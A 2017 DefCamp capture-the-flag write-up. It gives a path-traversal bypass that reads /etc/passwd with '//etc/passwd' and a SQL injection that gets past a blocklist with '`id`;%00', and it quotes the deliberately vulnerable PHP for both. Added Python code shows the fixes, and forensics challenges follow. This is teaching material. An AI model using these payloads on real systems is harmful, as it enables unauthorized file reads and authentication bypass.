
DefCamp CTF Qualification 2017 writeup

Posted at 2017-10-02

Is nano good?

Editing a file with nano (when its backup option is enabled) leaves a backup copy named file~ next to the original, and that is exactly what is exposed here: the PHP source can be read at
https://junior2.dctf-quals-17.def.camp/index.php~

<?php
$page = $_GET["page"];
$type = $_GET["type"];
if (strpos($page, './../') !== false){
    header("Location: https://www.youtube.com/watch?v=dQw4w9WgXcQ");
    die();
}

if (strpos($page, '..././') !== false){
    header("Location: http://leekspin.com/");
    die();
}

if (strpos($page, '%') !== false){
    header("Location: http://www.nyan.cat/");
    die();
}

if (strpos($page, 'fille') !== false){
    header("Location: https://www.youtube.com/watch?v=o1eHKf-dMwo");
    die();
}

if (strpos($page, '/etc/passwd') === 0) {
    header("Location: https://www.youtube.com/watch?v=djV11Xbc914");
    die();
}
# I wonder if I can bypass path traversal restriction by going back and forward within the directorys....
if ($type == ""){
    echo file_get_contents($page.".php");
} else {
    #maybe we need something from the website 
    echo file_get_contents($page); 
}
?>

The vulnerable part

if (strpos($page, '/etc/passwd') === 0) {
    header("Location: https://www.youtube.com/watch?v=djV11Xbc914");
    die();
}

strpos returns the index of the first occurrence of the second argument (the needle) within the first. The check above only redirects when that index is 0, i.e. when $page starts with /etc/passwd; it is a "starts with" test, not a "contains" test. Passing //etc/passwd instead puts the first occurrence at index 1, so the check is not triggered and
echo file_get_contents($page); is executed. (The type parameter has to be non-empty, otherwise the code appends .php to the path.)

The flag is in /etc/passwd.
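To make the difference between the five checks concrete, here is an added example (not the challenge's code) that re-implements them in Python, shows the path file_get_contents() ends up opening, and puts a canonicalisation-based check next to it as the fix. WEB_ROOT is a hypothetical document root; the challenge never discloses its real one.

```python
import posixpath

# Hypothetical document root for the hardened check (assumption; the
# challenge does not disclose its real one).
WEB_ROOT = "/var/www/html"


def challenge_filter_blocks(page: str) -> bool:
    """Re-implementation of the five strpos() checks from the leaked index.php.

    PHP's strpos($haystack, $needle) returns the index of the first match or
    false.  `!== false` therefore means "contains anywhere", while `=== 0`
    only means "starts with", which is the weak check.
    """
    if "./../" in page:                  # strpos($page, './../') !== false
        return True
    if "..././" in page:                 # strpos($page, '..././') !== false
        return True
    if "%" in page:                      # strpos($page, '%') !== false
        return True
    if "fille" in page:                  # strpos($page, 'fille') !== false
        return True
    if page.startswith("/etc/passwd"):   # strpos($page, '/etc/passwd') === 0
        return True
    return False


def challenge_target(page: str, type_param: str) -> str:
    """Path that file_get_contents() is asked to open: .php is appended
    unless the type parameter is non-empty."""
    return page + ".php" if type_param == "" else page


def hardened_blocks(page: str, root: str = WEB_ROOT) -> bool:
    """Fix: canonicalise first, then require the result to stay under the
    document root.  A leading '//' or an embedded '..' can no longer escape
    because the comparison happens on the normalised path.  posixpath is
    used instead of os.path.realpath so the check runs without touching the
    disk; in production realpath() additionally defeats symlink tricks."""
    if "\x00" in page:
        return True
    full = posixpath.normpath(posixpath.join(root, page.lstrip("/")))
    return not (full == root or full.startswith(root + "/"))
```

Note that the hardened check does not try to recognise bad strings at all: //etc/passwd is simply mapped to a path inside the root, and any ../ sequence that would leave the root is rejected after normalisation.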

Are you brave enough?

I could not solve this one during the competition. A pro explained it to me afterwards, so I am leaving a writeup (thank you very much).
There is an index.php~ here as well.

<?php

$db  = mysqli_connect('localhost','web_brave','','web_brave');

$id  = @$_GET['id'];
$key = $db->real_escape_string(@$_GET['key']);

if(preg_match('/\s|[\(\)\'"\/\\=&\|1-9]|#|\/\*|into|file|case|group|order|having|limit|and|or|not|null|union|select|from|where|--/i', $id))
    die('Attack Detected. Try harder: '. $_SERVER['REMOTE_ADDR']); // attack detected

$query = "SELECT `id`,`name`,`key` FROM `users` WHERE `id` = $id AND `key` = '".$key."'";
$q = $db->query($query);

if($q->num_rows) {
    echo '<h3>Users:</h3><ul>';
    while($row = $q->fetch_array()) {
        echo '<li>'.$row['name'].'</li>';
    }

    echo '</ul>';
} else {    
    die('<h3>Nop.</h3>');
}

$id is interpolated into the query without quotes, so passing `id` makes the WHERE clause compare the id column with itself (`id` = `id`), which is true for every row; backticks are not on the blocklist. The remaining problem is the AND `key` = '...' part that follows: comment sequences (--, #, /*) are blocked, so close the statement with ; and terminate it with %00 instead, and the flag comes back.

https://brave.dctf-quals-17.def.camp/index.php?id=`id`%3b%00
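The following is an added example, not the challenge's code: it translates the preg_match() blocklist to Python, builds the statement the same way index.php~ does, and runs it against a small sqlite3 table of constructed sample rows to show that the `id`;%00 payload returns every user, next to a parameterised version that is immune. Cutting the statement at the NUL byte is a model of the behaviour the writeup reports, not something the page proves about the server.

```python
import re
import sqlite3

# The challenge's preg_match() blocklist, translated to Python regex syntax.
# Note what it does NOT cover: backticks, semicolons, the digit 0 and NUL.
BLOCKLIST = re.compile(
    r"""\s|[()'"/\\=&|1-9]|#|/\*|into|file|case|group|order|having|limit"""
    r"""|and|or|not|null|union|select|from|where|--""",
    re.IGNORECASE,
)


def attack_detected(id_param: str) -> bool:
    return BLOCKLIST.search(id_param) is not None


def mysql_escape(s: str) -> str:
    """Minimal model of mysqli::real_escape_string (only the key gets it)."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\x00": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def build_query(id_param: str, key_param: str) -> str:
    """String-built statement exactly as in index.php~: id is interpolated raw."""
    return ("SELECT `id`,`name`,`key` FROM `users` WHERE `id` = "
            f"{id_param} AND `key` = '{mysql_escape(key_param)}'")


def effective_query(query: str) -> str:
    """The writeup's observation: the statement ends at the %00 byte, so the
    AND `key` = '...' clause after it is never parsed.  Modelled here as a
    plain string cut (assumption about the server's behaviour)."""
    return query.split("\x00", 1)[0]


def demo_db() -> sqlite3.Connection:
    """Constructed sample table; sqlite3 stands in for MySQL and accepts the
    backtick-quoted identifiers used in the challenge query."""
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE users (id INTEGER, name TEXT, "key" TEXT)')
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "flaguser", "hunter2")])
    return conn


def run_unsafe(conn, id_param: str, key_param: str):
    """The challenge's flow.  None means 'Attack Detected', else the names."""
    if attack_detected(id_param):
        return None
    q = effective_query(build_query(id_param, key_param))
    return [row[1] for row in conn.execute(q)]


def run_safe(conn, id_param: str, key_param: str):
    """Fix: validate id as an integer and bind both values; no blocklist."""
    if not re.fullmatch(r"[0-9]+", id_param):
        return []
    rows = conn.execute('SELECT name FROM users WHERE id = ? AND "key" = ?',
                        (int(id_param), key_param))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = demo_db()
    print(run_unsafe(db, "`id`;\x00", ""))   # every user, no key needed
    print(run_safe(db, "`id`;\x00", ""))     # []
```

The blocklist is long but the root cause is the unquoted, unbound $id; once the value is bound as a parameter, a blocklist is unnecessary and the digit-based exclusions (1-9 blocked, 0 allowed) stop mattering.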

A-talkative-server

I could not solve this during the competition either. With a bit more effort I might have, so this is a lesson for me.
Accessing
https://a-talkative-server.dctf-quals-17.def.camp/image.php
displays an image, but the page never finishes loading.
Since the image looked like the only clue, I downloaded it and got a huge PNG of about 11 GB.
Everything after the PNG data appears to be padded with \x00 bytes.
Extracting the bytes that are not \x00 and catting them gives

DCTF{1542879e00fdfffg8794348ai like trains9ea1ab24e12abba1sbax4dea314a8787542aea10951db794}

However, the flag format is said to be DCTF{32_bytes_in_hex}, so the parts that do not fit that format have to be removed.
The concatenated string alone does not show where the boundaries are, so hexdumping the downloaded PNG gives

00004ce0  84 00 00 00 00 49 45 4e  44 ae 42 60 82 00 00 00  |.....IEND.B`....|
00004cf0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
a0004ce0  00 00 00 00 00 00 00 00  00 00 00 00 00 44 43 54  |.............DCT|
a0004cf0  46 7b 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |F{..............|
a0004d00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
dac04cf0  00 00 31 35 34 32 00 00  00 00 00 00 00 00 00 00  |..1542..........|
dac04d00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
df1f34f0  00 00 00 00 00 00 38 37  39 65 00 00 00 00 00 00  |......879e......|
df1f3500  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
fdbff8f0  00 00 00 00 00 00 00 00  00 00 30 30 66 64 00 00  |..........00fd..|
fdbff900  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1021ff8f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 66 66  |..............ff|
1021ff900  66 67 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |fg..............|
1021ff910  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11d060d00  00 00 38 37 39 34 00 00  00 00 00 00 00 00 00 00  |..8794..........|
11d060d10  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11dadf100  00 00 00 00 00 00 33 34  38 61 00 00 00 00 00 00  |......348a......|
11dadf110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11ea93100  00 00 00 00 00 00 00 00  00 00 69 20 6c 69 6b 65  |..........i like|
11ea93110  20 74 72 61 69 6e 73 00  00 00 00 00 00 00 00 00  | trains.........|
11ea93120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
11fa47110  00 00 00 00 00 00 00 39  65 61 31 00 00 00 00 00  |.......9ea1.....|
11fa47120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
12ae4b910  00 00 00 00 00 00 00 00  00 00 00 61 62 32 34 00  |...........ab24.|
12ae4b920  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
13ff13110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 65  |...............e|
13ff13120  31 32 61 00 00 00 00 00  00 00 00 00 00 00 00 00  |12a.............|
13ff13130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
142714120  00 00 00 62 62 61 31 00  00 00 00 00 00 00 00 00  |...bba1.........|
142714130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
15d575520  00 00 00 00 00 00 00 73  62 61 78 00 00 00 00 00  |.......sbax.....|
15d575530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1783d6920  00 00 00 00 00 00 00 00  00 00 00 34 64 65 61 00  |...........4dea.|
1783d6930  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
17ae38920  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 33  |...............3|
17ae38930  31 34 61 00 00 00 00 00  00 00 00 00 00 00 00 00  |14a.............|
17ae38940  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
17cc3d130  00 00 00 38 37 38 37 00  00 00 00 00 00 00 00 00  |...8787.........|
17cc3d140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1a1a10d30  00 00 00 00 00 00 00 35  34 32 61 00 00 00 00 00  |.......542a.....|
1a1a10d40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1ae215d30  00 00 00 00 00 00 00 00  00 00 00 65 61 31 30 00  |...........ea10.|
1ae215d40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1dc615d30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 39  |...............9|
1dc615d40  35 31 64 00 00 00 00 00  00 00 00 00 00 00 00 00  |51d.............|
1dc615d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1e1615d40  00 00 00 62 37 39 34 00  00 00 00 00 00 00 00 00  |...b794.........|
1e1615d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
1f6a15d40  00 00 00 00 00 00 00 7d  00 00 00 00 00 00 00 00  |.......}........|
1f6a15d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*

This shows that the flag is scattered through the file in runs of four hex characters, each surrounded by long stretches of NUL bytes. Dropping the runs that are not hex (fffg, i like trains, sbax) and joining the rest gives a flag that was accepted:

DCTF{1542879e00fd8794348a9ea1ab24e12abba14dea314a8787542aea10951db794}
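The hexdump-reading step can be automated. The following is an added example, not the author's tooling: it streams a file in fixed-size chunks (so an 11 GB file never has to be read into memory), stitches together non-NUL runs that happen to straddle a chunk boundary, and then applies the rule derived above, keeping only the runs between DCTF{ and } that are exactly four hex digits. The sample input is constructed from the runs seen in the hexdump with 300 bytes of NUL padding instead of gigabytes.

```python
import re
from io import BytesIO
from typing import BinaryIO, Iterator, Tuple

HEX4 = re.compile(rb"[0-9a-f]{4}")


def nonnull_runs(stream: BinaryIO,
                 chunk_size: int = 1 << 20) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, run) for every maximal run of non-NUL bytes.

    The stream is read in fixed-size chunks so an 11 GB file never has to be
    loaded whole; a run that straddles a chunk boundary is stitched together
    because its start offset equals the end of the pending run.
    """
    offset = 0
    pending_start = 0
    pending = bytearray()
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        for m in re.finditer(rb"[^\x00]+", chunk):
            start = offset + m.start()
            if pending and start == pending_start + len(pending):
                pending += m.group()          # continuation across a boundary
            else:
                if pending:
                    yield pending_start, bytes(pending)
                pending_start, pending = start, bytearray(m.group())
        offset += len(chunk)
    if pending:
        yield pending_start, bytes(pending)


def recover_flag(stream: BinaryIO, chunk_size: int = 1 << 20) -> str:
    """Apply the writeup's filtering rule: collect the runs between the
    'DCTF{' and '}' runs and keep only those that are exactly four hex
    digits, which drops 'fffg', 'i like trains' and 'sbax'."""
    inside = False
    parts = []
    for _offset, run in nonnull_runs(stream, chunk_size):
        if run == b"DCTF{":
            inside = True
        elif run == b"}" and inside:
            break
        elif inside and HEX4.fullmatch(run):
            parts.append(run.decode("ascii"))
    return "DCTF{" + "".join(parts) + "}"


def build_sample() -> bytes:
    """Constructed stand-in for the challenge file: a fake PNG head and IEND
    chunk followed by the runs seen in the hexdump, separated by NUL padding
    (300 bytes here instead of the gigabytes in the real file)."""
    runs = [b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", b"DCTF{",
            b"1542", b"879e", b"00fd", b"fffg", b"8794", b"348a",
            b"i like trains", b"9ea1", b"ab24", b"e12a", b"bba1", b"sbax",
            b"4dea", b"314a", b"8787", b"542a", b"ea10", b"951d", b"b794", b"}"]
    pad = b"\x00" * 300
    return pad.join(runs) + pad


if __name__ == "__main__":
    # A deliberately tiny chunk size exercises the boundary-stitching path.
    print(recover_flag(BytesIO(build_sample()), chunk_size=7))
```

On the real file you would pass an open file object (open(path, "rb")) instead of the BytesIO; the generator never holds more than one chunk plus the current run in memory.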

A thousand words

Ten text files are given.
Concatenating the diff between 0001.txt and each of the other files yields the flag.

Inception

The flag is written inside one of the files that foremost carves out.

HitandSplit

Running strings on the capture shows the string DCTF, so the flag must be in one of the packets;
following the telnet session reveals the flag.
